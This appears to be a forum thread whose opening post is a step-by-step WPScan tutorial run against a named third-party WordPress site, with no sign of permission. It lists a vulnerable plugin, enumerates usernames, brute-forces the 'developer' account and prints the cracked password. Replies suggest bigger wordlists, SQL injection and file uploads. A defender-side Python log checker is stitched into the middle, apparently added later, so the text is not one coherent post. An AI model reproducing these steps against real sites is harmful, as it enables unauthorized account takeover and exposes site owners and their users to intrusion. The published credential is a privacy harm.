Enumerate WordPress sites with wpscan.rb
#1
No need for too much chatter, gang, straight to the point.
I wrote this one myself, it's original.

1. Open wpscan.rb ( /pentest/web/wpscan )
2. Type wpscan.rb, then Enter. Usually it asks whether you want to update or not; if not, type n, if you want to update type y.
[*] If you chose y, then once the update is finished, usually an error like this shows up when you open wpscan.rb
Code:
root@bt:/pentest/web/wpscan# ./wpscan.rb -h
[ERROR] Install missing ruby gem. Please see README file or http://code.google.com/p/wpscan/
#<LoadError: no such file to load -- nokogiri>
The solution is already in the error message, bro -_- :
Code:
gem install --user-install nokogiri
Code:
root@bt:/pentest/web/wpscan# gem install --user-install nokogiri
WARNING:  You don't have /root/.gem/ruby/1.9.2/bin in your PATH,
      gem executables will not run.
Building native extensions.  This could take a while...
Successfully installed nokogiri-1.5.2
1 gem installed
Installing ri documentation for nokogiri-1.5.2...
Installing RDoc documentation for nokogiri-1.5.2...

3. Type ./wpscan.rb or ./wpscan.rb --help
Code:
____________________________________________________
__          _______   _____                  
\ \        / /  __ \ / ____|                
  \ \  /\  / /| |__) | (___   ___  __ _ _ __  
   \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
    \  /\  /  | |     ____) | (__| (_| | | | |
     \/  \/   |_|    |_____/ \___|\__,_|_| |_| v1.1r425

    WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________

[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan

Help :

Some values are settable in conf/browser.conf.json :
  user-agent, proxy, threads, cache timeout and request timeout

--update   Update to the latest revision
--url   | -u <target url>  The WordPress URL/domain to scan.
--force | -f Forces WPScan to not check if the remote site is running WordPress.
--enumerate | -e [option(s)]  Enumeration.
  option :
    u        usernames from id 1 to 10
    u[10-20] usernames from id 10 to 20 (you must write [] chars)
    p        plugins
    p!       only vulnerable plugins
    t        timthumbs
  Multiple values are allowed : '-e tp' will enumerate timthumbs and plugins
  If no option is supplied, the default is 'tup!'

--follow-redirection  If the target url has a redirection, it will be followed without asking if you wanted to do so or not
--wp-content-dir <wp content dir>  WPScan try to find the content directory (ie wp-content) by scanning the index page, however you can specified it. Subdirectories are allowed
--wp-plugins-dir <wp plugins dir>  Same thing than --wp-content-dir but for the plugins directory. If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed
--proxy  Supply a proxy in the format host:port (will override the one from conf/browser.conf.json)
--wordlist | -w <wordlist>  Supply a wordlist for the password bruter and do the brute.
--threads  | -t <number of threads>  The number of threads to use when multi-threading requests. (will override the value from conf/browser.conf.json)
--username | -U <username>  Only brute force the supplied username.
--help     | -h This help screen.
--verbose  | -v Verbose output.

Up to here, bro, you can carry on by yourself, right? \m/
If there's anyone who doesn't know yet, fine, I'll give the tutorial too. For those who already know, what are you doing here :-?

4. Enter the URL and choose the other options, for example I want to look at the vulnerable plugins:
Code:
./wpscan.rb --url www.productbestbuy.com --enumerate p!
Code:
root@bt:/pentest/web/wpscan# ./wpscan.rb --url www.productbestbuy.com --enumerate p!
____________________________________________________
__          _______   _____                  
\ \        / /  __ \ / ____|                
  \ \  /\  / /| |__) | (___   ___  __ _ _ __  
   \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
    \  /\  /  | |     ____) | (__| (_| | | | |
     \/  \/   |_|    |_____/ \___|\__,_|_| |_| v1.1r425

    WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________

[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan

| URL: http://www.productbestbuy.com
| Started on Sun Dec 30 21:54:53 2012

[!] The WordPress theme in use is easel v3.0.7
[!] The WordPress 'http://www.productbestbuy.com/readme.html' file exists
[!] Full Path Disclosure (FPD) in 'http://www.productbestbuy.com/wp-includes/rss-functions.php'
[!] WordPress version 3.4.1 identified from meta generator

[+] Enumerating plugins from passive detection ... 2 found :

| Name: amazon-link
| Location: http://www.productbestbuy.com/$wp-plugins$/amazon-link/

| Name: jetpack
| Location: http://www.productbestbuy.com/$wp-plugins$/jetpack/
|
| [!] jetpack plugin SQL Injection Vulnerability
| * Reference: http://www.exploit-db.com/exploits/18126/

[+] Enumerating installed plugins (only vulnerable ones) ...

Checking for 253 total plugins... 100% complete.

[+] We found 1 plugins:

| Name: jetpack
| Location: http://www.productbestbuy.com/wp-content/plugins/jetpack/
| Directory listing enabled? Yes.
|
| [!] jetpack plugin SQL Injection Vulnerability
| * Reference: http://www.exploit-db.com/exploits/18126/

[+] Finished at Sun Dec 30 21:56:44 2012
There you go bro, it found 1 vulnerable plugin, and it even hands you the exploit.

5. Now I'll try to find the usernames:
Code:
./wpscan.rb --url www.productbestbuy.com --enumerate u
Code:
./wpscan.rb --url www.productbestbuy.com --enumerate u
____________________________________________________
__          _______   _____                  
\ \        / /  __ \ / ____|                
  \ \  /\  / /| |__) | (___   ___  __ _ _ __  
   \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
    \  /\  /  | |     ____) | (__| (_| | | | |
     \/  \/   |_|    |_____/ \___|\__,_|_| |_| v1.1r425

    WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________

[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan

| URL: http://www.productbestbuy.com
| Started on Sun Dec 30 22:22:31 2012

[!] The WordPress theme in use is easel v3.0.7
[!] The WordPress 'http://www.productbestbuy.com/readme.html' file exists
[!] Full Path Disclosure (FPD) in 'http://www.productbestbuy.com/wp-includes/rss-functions.php'
[!] WordPress version 3.4.1 identified from meta generator

[+] Enumerating plugins from passive detection ... 2 found :

| Name: amazon-link
| Location: http://www.productbestbuy.com/$wp-plugins$/amazon-link/

| Name: jetpack
| Location: http://www.productbestbuy.com/$wp-plugins$/jetpack/
|
| [!] jetpack plugin SQL Injection Vulnerability
| * Reference: http://www.exploit-db.com/exploits/18126/

[+] Enumerating usernames ...

We found the following 2 username/s :

  admin
  developer
There are 2 users, bro: admin and developer.
The new wpscan version is weird; I only wanted to search for usernames, but it scans the plugins too :-? (just a waste of time)

6. Now find the password with brute force; that means you need to have a wordlist.lst ready. My wordlist is at /root/Desktop/wordlist.lst
Code:
./wpscan.rb --url www.productbestbuy.com --username developer --wordlist /root/Desktop/wordlist.lst
Code:
./wpscan.rb --url www.productbestbuy.com --username developer --wordlist /root/Desktop/wordlist.lst
____________________________________________________
__          _______   _____                  
\ \        / /  __ \ / ____|                
  \ \  /\  / /| |__) | (___   ___  __ _ _ __  
   \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
    \  /\  /  | |     ____) | (__| (_| | | | |
     \/  \/   |_|    |_____/ \___|\__,_|_| |_| v1.1r425

    WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________

[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan

| URL: http://www.productbestbuy.com
| Started on Sun Dec 30 22:36:41 2012

[!] The WordPress theme in use is easel v3.0.7
[!] The WordPress 'http://www.productbestbuy.com/readme.html' file exists
[!] Full Path Disclosure (FPD) in 'http://www.productbestbuy.com/wp-includes/rss-functions.php'
[!] WordPress version 3.4.1 identified from meta generator

[+] Enumerating plugins from passive detection ...
2 found :

| Name: amazon-link
| Location: http://www.productbestbuy.com/$wp-plugins$/amazon-link/

| Name: jetpack
| Location: http://www.productbestbuy.com/$wp-plugins$/jetpack/
|
| [!] jetpack plugin SQL Injection Vulnerability
| * Reference: http://www.exploit-db.com/exploits/18126/

[+] Starting the password brute forcer

  Brute forcing user 'developer' with 12 passwords... 58% complete.
  [SUCCESS] Username : developer Password : cisadane123456


[+] Finished at Sun Dec 30 22:38:18 2012
Code:
Username : developer Password : cisadane123456
pic:
[Image: hack_wp.png]

author : RieqyNS13
wpscan developer : ethicalhacke3r
403 Forbidden
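A defender-side counterpart to the runs above, added here as an example (not from the original post and not part of WPScan): a small log checker that flags the two request patterns a username enumeration (walking ?author=N ids) and a wp-login.php password brute force leave in an Apache access log. The log lines are constructed, and the IP addresses, thresholds and the "200 means failed login / 302 means success" rule for wp-login.php are assumptions.

```python
import re
from collections import defaultdict

# Apache combined-log line: client IP, request line, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
AUTHOR_RE = re.compile(r'[?&]author=(\d+)')

def parse_line(line):
    """Return (ip, method, path, status) or None for a line we cannot parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, path, status = m.groups()
    return ip, method, path, int(status)

def analyse(log_text, min_author_ids=3, min_failed_logins=10):
    """Flag IPs that walk ?author=N ids (username enumeration) or POST to
    wp-login.php repeatedly and get a 200 back (WordPress re-renders the
    login form on failure; a successful login answers with a 302)."""
    author_ids = defaultdict(set)
    failed_logins = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # skip malformed lines instead of crashing the sweep
        ip, method, path, status = rec
        a = AUTHOR_RE.search(path)
        if method == "GET" and a:
            author_ids[ip].add(int(a.group(1)))
        elif method == "POST" and path.split("?")[0].endswith("/wp-login.php") and status == 200:
            failed_logins[ip] += 1
    return {
        "user_enumeration": {ip: len(s) for ip, s in author_ids.items() if len(s) >= min_author_ids},
        "login_bruteforce": {ip: n for ip, n in failed_logins.items() if n >= min_failed_logins},
    }

def _line(ip, method, path, status):  # builds one constructed log line
    return f'{ip} - - [30/Dec/2012:22:22:40 +0700] "{method} {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"'

# Constructed sample: one scanner IP enumerates ids 1-10 and fails 12 logins,
# one ordinary visitor loads the front page and logs in once successfully.
SAMPLE_LOG = "\n".join(
    [_line("203.0.113.7", "GET", f"/?author={i}", 301) for i in range(1, 11)]
    + [_line("203.0.113.7", "POST", "/wp-login.php", 200) for _ in range(12)]
    + [_line("198.51.100.9", "GET", "/", 200),
       _line("198.51.100.9", "POST", "/wp-login.php", 302)]
)

if __name__ == "__main__":
    print(analyse(SAMPLE_LOG))
```

Feed a real access log to analyse() and tune the two thresholds to the site's normal traffic; a hit on either key is a reason to rate-limit or block that IP at the web server.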

#2
Oh right, what if the password isn't in the dictionary?

Is there another way without using this wpscan..?

#3
(12-31-2012, 12:25 PM)blAnk_pag3 Wrote: Oh right, what if the password isn't in the dictionary?

Is there another way without using this wpscan..?

Find a thicker dictionary :D

Besides cracking passwords there are plenty of other variations too: SQLi all the way to file upload or the database, depending on where the vulnerability is; mostly in plugins though.

#4
Oh right, is the wordlist for cracking wifi the same as the wordlist for brute forcing with wpscan.rb?

#5
(01-05-2013, 08:47 AM)agusst Wrote: Oh right, is the wordlist for cracking wifi the same as the wordlist for brute forcing with wpscan.rb?

It's the same, man, but the results aren't the same: if, say, you manage to crack the wifi with that wordlist, it won't necessarily succeed in wpscan :)

#6
Why does this give an error? :-?

PHP Code:
[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan

[ERROR] The option: timeout is invalid.
Trace : ["/root/.gem/ruby/1.9.2/gems/ethon-0.5.7/lib/ethon/multi.rb:103:in `block in set_attributes'", "/root/.gem/ruby/1.9.2/gems/ethon-0.5.7/lib/ethon/multi.rb:101:in `each_pair'", "/root/.gem/ruby/1.9.2/gems/ethon-0.5.7/lib/ethon/multi.rb:101:in `set_attributes'", "/root/.gem/ruby/1.9.2/gems/ethon-0.5.7/lib/ethon/multi.rb:86:in `initialize'", "/root/.gem/ruby/1.9.2/gems/typhoeus-0.5.3/lib/typhoeus/hydra.rb:96:in `new'", "/root/.gem/ruby/1.9.2/gems/typhoeus-0.5.3/lib/typhoeus/hydra.rb:96:in `initialize'", "/pentest/web/wpscan/lib/browser.rb:49:in `new'", "/pentest/web/wpscan/lib/browser.rb:49:in `initialize'", "/pentest/web/wpscan/lib/browser.rb:62:in `new'", "/pentest/web/wpscan/lib/browser.rb:62:in `instance'", "/pentest/web/wpscan/lib/wpscan/wp_target.rb:43:in `initialize'", "./wpscan.rb:51:in `new'", "./wpscan.rb:51:in `<main>'"]

Clound@IBTeam:~#
EMail Me : [email protected]

#7
hahahaaa... I've used this thing before, got a bit confused and was about to put it on hold, and now there's a tutorial here..
Very useful, mate... :D
